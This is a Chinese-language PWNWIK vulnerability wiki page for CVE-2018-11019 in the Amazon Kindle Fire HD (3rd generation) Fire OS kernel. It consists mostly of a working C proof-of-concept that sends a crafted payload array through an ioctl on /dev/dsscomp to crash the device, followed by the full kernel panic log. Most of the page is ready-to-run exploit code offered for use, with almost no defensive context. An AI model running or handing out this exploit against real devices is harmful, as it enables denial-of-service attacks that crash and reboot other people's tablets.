Loading
0

CVE-2018-11019 Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞/zh-cn

PWNWIK.COM

,

漏洞影响

Fire OS 4.5.5.3

POC

/*
 * This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517.
 * Related buggy struct name is dsscomp_setup_dispc_data.
 * This Poc should run with permission to do ioctl on /dev/dsscomp.
 *
 * The fowllwing is kmsg of kernel crash infomation:
 *
 *
 */
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/dsscomp";
static command = 1118064517; 

int main(int argc, char **argv, char **env) {
    unsigned int payload = {
    0xffffffff,
    0x00000003,
    0x5d200040,
    0x79900008,
    0x8f5928bd,
    0x78b02422,
    0x00000000,
    0xffffffff,
    0xf4c50400,
    0x007fffff,
    0x8499f562,
    0xffff0400,
    0x001b131d,
    0x60818210,
    0x00000007,
    0xffffffff,
    0x00000000,
    0x9da9041c,
    0xcd980400,
    0x001f03f4,
    0x00000007,
    0x2a34003f,
    0x7c80d8f3,
    0x63102627,
    0xc73643a8,
    0xa28f0665,
    0x00000000,
    0x689e57b4,
    0x01ff0008,
    0x5e7324b1,
    0xae3b003f,
    0x0b174d86,
    0x00000400,
    0x21ffff37,
    0xceb367a4,
    0x00000040,
    0x00000001,
    0xec000f9e,
    0x00000001,
    0x000001ff,
    0x00000000,
    0x00000000,
    0x0000000f,
    0x0425c069,
    0x038cc3be,
    0x0000000f,
    0x00000080,
    0xe5790100,
    0x5b1bffff,
    0x0000d355,
    0x0000c685,
    0xa0070000,
    0x0010ffff,
    0x00a0ff00,
    0x00000001,
    0xff490700,
    0x0832ad03,
    0x00000006,
    0x00000002,
    0x00000001,
    0x81f871c0,
    0x738019cb,
    0xbf47ffff,
    0x00000040,
    0x00000001,
    0x7f190f33,
    0x00000001,
    0x8295769b,
    0x0000003f,
    0x869f2295,
    0xffffffff,
    0xd673914f,
    0x05055800,
    0xed69b7d5,
    0x00000000,
    0x0107ebbd,
    0xd214af8d,
    0xffff4a93,
    0x26450008,
    0x58df0000,
    0xd16db084,
    0x03ff30dd,
    0x00000001,
    0x209aff3b,
    0xe7850800,
    0x00000002,
    0x30da815c,
    0x426f5105,
    0x0de109d7,
    0x2c1a65fc,
    0xfcb3d75f,
    0x00000000,
    0x00000001,
    0x8066be5b,
    0x00000002,
    0xffffffff,
    0x5cf232ec,
    0x680d1469,
    0x00000001,
    0x00000020,
    0xffffffff,
    0x00000400,
    0xd1d12be8,
    0x02010200,
    0x01ffc16f,
    0xf6e237e6,
    0x007f0000,
    0x01ff08f8,
    0x000f00f9,
    0xbad07695,
    0x00000000,
    0xbaff0000,
    0x24040040,
    0x00000006,
    0x00000004,
    0x00000000,
    0xbc2e9242,
    0x009f5f08,
    0x00800000,
    0x00000000,
    0x00000001,
    0xff8800ff,
    0x00000001,
    0x00000000,
    0x000003f4,
    0x6faa8472,
    0x00000400,
    0xec857dd5,
    0x00000000,
    0x00000040,
    0xffffffff,
    0x3f004874,
    0x0000b77a,
    0xec9acb95,
    0xfacc0001,
    0xffff0001,
    0x0080ffff,
    0x3600ff03,
    0x00000001,
    0x8fff7d7f,
    0x6b87075a,
    0x00000000,
    0x41414141,
    0x41414141,
    0x41414141,
    0x41414141,
    0x001001ff,
    0x00000000,
    0x00000001,
    0xff1f0512,
    0x00000001,
    0x51e32167,
    0xc18c55cc,
    0x00000000,
    0xffffffff,
    0xb4aaf12b,
    0x86edfdbd,
    0x00000010,
    0x0000003f,
    0xabff7b00,
    0xffff9ea3,
    0xb28e0040,
    0x000fffff,
    0x458603f4,
    0xffff007f,
    0xa9030f02,
    0x00000001,
    0x002cffff,
    0x9e00cdff,
    0x00000004,
    0x41414141,
    0x41414141,
    0x41414141,
    0x41414141 };

        int fd = 0;
        fd = open(driver, O_RDWR);
        if (fd < 0) {
            printf("Failed to open %s, with errno %d\n", driver, errno);
            system("echo 1 > /data/local/tmp/log");
            return -1;
        }

        printf("Try open %s with command 0x%x.\n", driver, command);
        printf("System will crash and reboot.\n");
        if(ioctl(fd, command, &payload) < 0) {
            printf("Allocation of structs failed, %d\n", errno);
            system("echo 2 > /data/local/tmp/log");
            return -1;
        }
        close(fd);
        return 0;
}
崩溃日志
  164.793151 Unable to handle kernel NULL pointer dereference at virtual address 00000037
  164.802459 pgd = c26ec000
  164.805664 00000037 *pgd=82f42831, *pte=00000000, *ppte=00000000
  164.813415 Internal error: Oops: 17 #1 PREEMPT SMP ARM
  164.819458 Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
  164.827239 CPU: 1    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
  164.834686 PC is at dev_ioctl+0x4ac/0x10c4
  164.839416 LR is at down_timeout+0x40/0x5c
  164.844146 pc : <c03178e8>    lr : <c006e9b8>    psr: 60000013
  164.844146 sp : c25a1e70  ip : c25a1e50  fp : c25a1f04
  164.857116 r10: 00000000  r9 : d8c0aca8  r8 : bed5c610
  164.863128 r7 : c0a25b50  r6 : c25a0000  r5 : bed5c610  r4 : 0000000f
  164.870391 r3 : 00001403  r2 : 00000000  r1 : 20000013  r0 : 00000000
  164.877807 Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
  164.885894 Control: 10c5387d  Table: 826ec04a  DAC: 00000015
  164.892303 
  164.892333 PC: 0xc0317868:
  164.897308 7868  30d22003 33a03000 e3530000 0a0001c5 e3e0500d eaffff02 e1a0200d e3c26d7f
  164.907989 7888  e3c6603f e5963008 e2952008 30d22003 33a03000 e3530000 1a000021 e24b3064
  164.918670 78a8  e1a01005 e3a02008 e50b3088 e1a00003 ebfcfa5f e3500000 1a00001e e51b4060
  164.929351 78c8  e3020710 e59f7bdc ebf4db32 e1a01000 e2870038 ebf55c25 e3500000 1a0002e0
  164.939880 78e8  e5943028 e1a08000 e5940024 e1a02007 e2841024 e5803004 e5830000 e5b23070
  164.950561 7908  e5871070 e2420038 e5831004 e5843024 e5842028 ebf55bb9 e50b8060 e50b8064
  164.961212 7928  ea000006 e24b1064 e50b1088 e51b0088 e3a01008 ebfd0387 e3a03004 e50b3064
  164.971771 7948  e5963008 e2952008 30d22003 33a03000 e3530000 1affffc5 e1a00005 e51b1088
  164.982299 
  164.982330 LR: 0xc006e938:
  164.987426 e938  e1a01000 0a000007 e3a05000 e2433001 e5843008 e1a00004 eb18d7ad e1a00005
  164.997955 e958  e24bd014 e89da830 e1a00004 e50b1018 eb18d135 e51b1018 e1a05000 eafffff4
  165.008636 e978  e1a0c00d e92dd878 e24cb004 e1a04000 e1a05001 eb18d91b e5943008 e3530000
  165.019317 e998  e1a06000 0a000007 e3a05000 e2433001 e5843008 e1a00004 e1a01006 eb18d794
  165.029846 e9b8  e1a00005 e89da878 e1a01005 e1a00004 eb18d158 e1a05000 eafffff5 e1a0c00d
  165.040374 e9d8  e92dd800 e24cb004 e5903000 e1a0c000 e3530000 0a00000b e5910008 e5932008
  165.051055 e9f8  e1500002 da000003 ea000006 e5932008 e1520000 ba000003 e283c004 e5933004
  165.061737 ea18  e3530000 1afffff8 e5813004 f57ff05f e3a00000 e58c1000 e89da800 e1a0c00d
  165.072265 
  165.072265 SP: 0xc25a1df0:
  165.077362 1df0  00000001 00000004 d454d000 0000001d c25a1e3c c03178e8 60000013 ffffffff
  165.087890 1e10  c25a1e5c bed5c610 c25a1f04 c25a1e28 c06a5318 c0008370 00000000 20000013
  165.098419 1e30  00000000 00001403 0000000f bed5c610 c25a0000 c0a25b50 bed5c610 d8c0aca8
  165.109100 1e50  00000000 c25a1f04 c25a1e50 c25a1e70 c006e9b8 c03178e8 60000013 ffffffff
  165.119781 1e70  00000001 00000028 000fffff c25a1ea0 c25a1edc c25a1e90 c0207454 c00bd920
  165.130340 1e90  0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff 0000000f 00000000 ffffffff
  165.141021 1eb0  00000002 00000001 00000000 c25a1f14 00000000 00000001 d8c0aca8 d70c5580
  165.151702 1ed0  c25a1efc c25a1ee0 c02089fc 00000000 c719ab40 00000004 c719ab40 bed5c610
  165.162353 
  165.162384 IP: 0xc25a1dd0:
  165.167327 1dd0  c0070df8 c00795ac c25a0000 00000001 00000004 d454d0f4 60000013 00000001
  165.178009 1df0  00000001 00000004 d454d000 0000001d c25a1e3c c03178e8 60000013 ffffffff
  165.188537 1e10  c25a1e5c bed5c610 c25a1f04 c25a1e28 c06a5318 c0008370 00000000 20000013
  165.199249 1e30  00000000 00001403 0000000f bed5c610 c25a0000 c0a25b50 bed5c610 d8c0aca8
  165.209899 1e50  00000000 c25a1f04 c25a1e50 c25a1e70 c006e9b8 c03178e8 60000013 ffffffff
  165.220581 1e70  00000001 00000028 000fffff c25a1ea0 c25a1edc c25a1e90 c0207454 c00bd920
  165.231109 1e90  0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff 0000000f 00000000 ffffffff
  165.241790 1eb0  00000002 00000001 00000000 c25a1f14 00000000 00000001 d8c0aca8 d70c5580
  165.252441 
  165.252441 FP: 0xc25a1e84:
  165.257415 1e84  c25a1e90 c0207454 c00bd920 0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff
  165.268066 1ea4  0000000f 00000000 ffffffff 00000002 00000001 00000000 c25a1f14 00000000
  165.278717 1ec4  00000001 d8c0aca8 d70c5580 c25a1efc c25a1ee0 c02089fc 00000000 c719ab40
  165.289276 1ee4  00000004 c719ab40 bed5c610 d8c0aca8 00000000 c25a1f74 c25a1f08 c0136044
  165.299926 1f04  c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
  165.310607 1f24  c25a1f0c c25a0000 bed5c638 bed5c610 c0085d9e c719ab40 00000004 c25a0000
  165.321136 1f44  00000000 c25a1f64 00000000 bed5c610 c0085d9e c719ab40 00000004 c25a0000
  165.331695 1f64  00000000 c25a1fa4 c25a1f78 c01365e0 c0135fc4 00000000 00000000 00000400
  165.342346 
  165.342376 R6: 0xc259ff80:
  165.347320 ff80  00000093 00000093 0000008d 00000002 00000000 00000000 00000000 00000000
  165.358001 ffa0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
  165.368682 ffc0  00000093 00000093 0000008d 00000002 00000000 00000000 00000000 00000000
  165.379241 ffe0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
  165.389770 0000  00000000 00000002 00000000 d72b0980 c0a0e840 00000001 00000015 c265dc00
  165.400451 0020  00000000 c25a0000 c09ddc50 d72b0980 de949300 c1620b40 c25a1b7c c25a1ac8
  165.411132 0040  c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
  165.421661 0060  005634c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000
  165.432342 
  165.432342 R7: 0xc0a25ad0:
  165.437316 5ad0  00010105 01010005 01040901 00040001 ffff0101 00000000 00000000 00040b03
  165.447875 5af0  01040101 ffff0100 00000000 00000000 0000ffff 00000000 0e0c0000 01010005
  165.458526 5b10  01000105 0000ffff 00000000 0e0c0000 01010005 00000105 01040901 00040001
  165.469207 5b30  ffff0101 00000000 00000000 00040b03 01040101 3f3f0100 00010001 01000001
  165.479736 5b50  00000000 00000000 00000001 c0a25b5c c0a25b5c c0a25b64 c0a25b64 00000000
  165.490417 5b70  00000000 00000001 c0a25b78 c0a25b78 c0a25b80 c0a25b80 00000000 00000000
  165.500946 5b90  00000000 c0a25b94 c0a25b94 c0a25b9c c0a25b9c 00000000 00000000 00000001
  165.511627 5bb0  c0a25bb0 c0a25bb0 c0a25bb8 c0a25bb8 c0a25bc0 c0a25bc0 c0a25bc8 c0a25bc8
  165.522186 
  165.522186 R9: 0xd8c0ac28:
  165.527282 ac28  d8c0ac28 d8c0ac28 00000000 00000000 00000000 c06bc674 000200da c09dda58
  165.537841 ac48  00000000 00000000 d8c0ac50 d8c0ac50 00000000 c0aa5174 c0aa5174 c0aa5148
  165.548492 ac68  5aefbbda 00000000 00000000 00000000 d8c0ac80 00000000 00000000 00000000
  165.559020 ac88  00200000 00000000 00000000 d8c0ac94 d8c0ac94 dd3f6080 dd3f6080 00000000
  165.569702 aca8  000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400
  165.580261 acc8  d8c0ad80 dd3ede70 00001064 00000001 0fb00000 5aefbbda 2e19b832 5aefbbda
  165.590911 ace8  2e19b832 5aefbbda 2e19b832 00000000 00000000 00000000 00000000 00000000
  165.601593 ad08  00000000 00000000 00000000 00000000 00000001 00000000 00000000 d8c0ad24
  165.612121 Process gcioctl_poc (pid: 3932, stack limit = 0xc25a02f8)
  165.619445 Stack: (0xc25a1e70 to 0xc25a2000)
  165.624359 1e60:                                     00000001 00000028 000fffff c25a1ea0
  165.633605 1e80: c25a1edc c25a1e90 c0207454 c00bd920 0000001e c2db9600 c25a1ed4 c25a1ea8
  165.642822 1ea0: ffffffff 0000000f 00000000 ffffffff 00000002 00000001 00000000 c25a1f14
  165.652038 1ec0: 00000000 00000001 d8c0aca8 d70c5580 c25a1efc c25a1ee0 c02089fc 00000000
  165.661102 1ee0: c719ab40 00000004 c719ab40 bed5c610 d8c0aca8 00000000 c25a1f74 c25a1f08
  165.670318 1f00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190
  165.679565 1f20: dcf8c440 c25a1f0c c25a0000 bed5c638 bed5c610 c0085d9e c719ab40 00000004
  165.688781 1f40: c25a0000 00000000 c25a1f64 00000000 bed5c610 c0085d9e c719ab40 00000004
  165.697875 1f60: c25a0000 00000000 c25a1fa4 c25a1f78 c01365e0 c0135fc4 00000000 00000000
  165.707092 1f80: 00000400 bed5c638 00010e64 00000000 00000036 c0013e08 00000000 c25a1fa8
  165.716308 1fa0: c0013c60 c0136578 bed5c638 00010e64 00000004 c0085d9e bed5c610 bed5c610
  165.725402 1fc0: bed5c638 00010e64 00000000 00000036 00000000 00000000 00000000 bed5c624
  165.734619 1fe0: 00000000 bed5c5f4 000106a4 0002918c 60000010 00000004 00000000 00000000
  165.743835 Backtrace: 
  165.746856 <c031743c> (dev_ioctl+0x0/0x10c4) from <c0136044> (do_vfs_ioctl+0x8c/0x5b4)
  165.756256 <c0135fb8> (do_vfs_ioctl+0x0/0x5b4) from <c01365e0> (sys_ioctl+0x74/0x84)
  165.765502 <c013656c> (sys_ioctl+0x0/0x84) from <c0013c60> (ret_fast_syscall+0x0/0x30)
  165.774780  r8:c0013e08 r7:00000036 r6:00000000 r5:00010e64 r4:bed5c638
  165.783203 Code: e2870038 ebf55c25 e3500000 1a0002e0 (e5943028) 
  165.793060 Board Information: 
  165.793060  Revision : 0001
  165.793060  Serial    : 0000000000000000
  165.793090 SoC Information:
  165.793090  CPU    : OMAP4470
  165.793090  Rev    : ES1.0
  165.793121  Type    : HS
  165.793121  Production ID: 0002B975-000000CC
  165.793121  Die ID    : 1CC60000-50002FFF-0B00935D-11007004
  165.793121 
  165.844757 --- end trace aba846a2af6e75b7 ---
  165.850097 Kernel panic - not syncing: Fatal exception
  165.856109 CPU0: stopping
  165.859252 Backtrace: 
  165.862274 <c0018148> (dump_backtrace+0x0/0x10c) from <c0698bb8> (dump_stack+0x18/0x1c)
  165.871643  r6:c09ddc50 r5:c09dc844 r4:00000000 r3:c0a0e950
  165.878784 <c0698ba0> (dump_stack+0x0/0x1c) from <c0019bd8> (handle_IPI+0x190/0x1c4)
  165.887908 <c0019a48> (handle_IPI+0x0/0x1c4) from <c00084fc> (gic_handle_irq+0x58/0x60)
  165.897399 <c00084a4> (gic_handle_irq+0x0/0x60) from <c06a5380> (__irq_svc+0x40/0x70)
  165.906707 Exception stack(0xd8dcfc38 to 0xd8dcfc80)
  165.912384 fc20:                                                       c153a9f8 00000000
  165.921600 fc40: 00000002 c153aa08 00000007 c153a9f8 d8d72210 b6eaf010 d8caee34 bab7375f
  165.930816 fc60: 00000001 d8dcfcac 0009eded d8dcfc80 c010a5b4 c010a5fc 20070013 ffffffff
  165.940032  r6:ffffffff r5:20070013 r4:c010a5fc r3:c010a5b4
  165.947052 <c010a534> (follow_page+0x0/0x238) from <c010af94> (__get_user_pages+0x13c/0x3f0)
  165.957031 <c010ae58> (__get_user_pages+0x0/0x3f0) from <c010b350> (get_user_pages+0x50/0x58)
  165.967102 <c010b300> (get_user_pages+0x0/0x58) from <c00ff544> (get_user_pages_fast+0x64/0x7c)
  165.977233  r4:d8caee3c
  165.980468 <c00ff4e0> (get_user_pages_fast+0x0/0x7c) from <c01eeff0> (fuse_copy_fill+0x1bc/0x238)
  165.990905 <c01eee34> (fuse_copy_fill+0x0/0x238) from <c01ef0a4> (fuse_copy_one+0x38/0x68)
  166.000579  r6:d8dcdb00 r5:d8dce000 r4:d8dcfe24 r3:00000000
  166.007690 <c01ef06c> (fuse_copy_one+0x0/0x68) from <c01efe64> (fuse_dev_do_read+0x3e4/0x69c)
  166.017761  r4:dd243c00
  166.020874 <c01efa80> (fuse_dev_do_read+0x0/0x69c) from <c01f03c0> (fuse_dev_read+0x84/0x9c)
  166.030853 <c01f033c> (fuse_dev_read+0x0/0x9c) from <c0124ecc> (do_sync_read+0xb0/0xf0)
  166.040222  r7:00000000 r6:00000000 r5:00000000 r4:00000000
  166.047363 <c0124e1c> (do_sync_read+0x0/0xf0) from <c01258f4> (vfs_read+0xa4/0x148)
  166.056488 <c0125850> (vfs_read+0x0/0x148) from <c01259d8> (sys_read+0x40/0x78)
  166.065093  r8:00040050 r7:b6eaf010 r6:d8e08900 r5:00000000 r4:00000000
  166.073547 <c0125998> (sys_read+0x0/0x78) from <c0013c60> (ret_fast_syscall+0x0/0x30)
  166.082855  r8:c0013e08 r7:00000003 r6:b6eaf008 r5:b73828a0 r4:b6eaf010
  166.091217 CPU0 PC (0) : 0xc0019b2c
  166.095397 CPU0 PC (1) : 0xc0019b2c
  166.099456 CPU0 PC (2) : 0xc0019b2c
  166.103515 CPU0 PC (3) : 0xc0019b2c
  166.107574 CPU0 PC (4) : 0xc0019b2c
  166.111785 CPU0 PC (5) : 0xc0019b2c
  166.115814 CPU0 PC (6) : 0xc0019b2c
  166.119873 CPU0 PC (7) : 0xc0019b2c
  166.124084 CPU0 PC (8) : 0xc0019b2c
  166.128112 CPU0 PC (9) : 0xc0019b2c
  166.132171 CPU1 PC (0) : 0xc003ee38
  166.136352 CPU1 PC (1) : 0xc003ee54
  166.140411 CPU1 PC (2) : 0xc003ee54
  166.144470 CPU1 PC (3) : 0xc003ee54
  166.148681 CPU1 PC (4) : 0xc003ee54
  166.152709 CPU1 PC (5) : 0xc003ee54
  166.156768 CPU1 PC (6) : 0xc003ee54
  166.160980 CPU1 PC (7) : 0xc003ee54
  166.165008 CPU1 PC (8) : 0xc003ee54
  166.169067 CPU1 PC (9) : 0xc003ee54
  166.173126 
  166.175048 Restarting Linux version 3.4.83-gd2afc0bae69 (email protected) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
  166.175079

pwnwiki.com